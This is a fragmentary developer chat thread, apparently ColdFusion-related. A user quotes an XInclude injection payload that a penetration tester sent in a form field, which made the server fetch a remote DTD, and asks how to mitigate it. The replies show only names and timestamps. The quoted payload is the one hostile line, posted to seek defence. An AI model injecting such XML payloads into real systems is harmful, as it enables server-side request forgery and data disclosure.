Dave Merrill
06/16/2022, 5:44 PM<kwp xmlns:xi="<http://www.w3.org/2001/XInclude>"><xi=include href="<http://some-page-on-pentesters-sit.dtd>"/></kwp>
That had the effect or requesting that doc from the remote site.
The page on our site didn't echo that value out, so it seems like it's the original POST that fetches that document from the remote site, and I don't see how I can do anything to prevent that.
I also can't reproduce it by including a hidden field with that value pointing to a page on our own site, but their form had a bunch of other values in other fields too, including a checksum etc.
Is anyone familiar with this sort of hack tech, or how I can mitigate it?
Any user entered values that do get rendered on the page are htmlEditFormat() encoded, so they're not active HTML.
What else should I be doing?aliaspooryorik
aliaspooryorik
Adam Cameron
aliaspooryorik
asishd
06/17/2022, 8:27 AMaliaspooryorik
aliaspooryorik
aliaspooryorik
aliaspooryorik
aliaspooryorik
aliaspooryorik
aliaspooryorik
zackster
06/17/2022, 9:29 AMDave Merrill
06/17/2022, 2:13 PM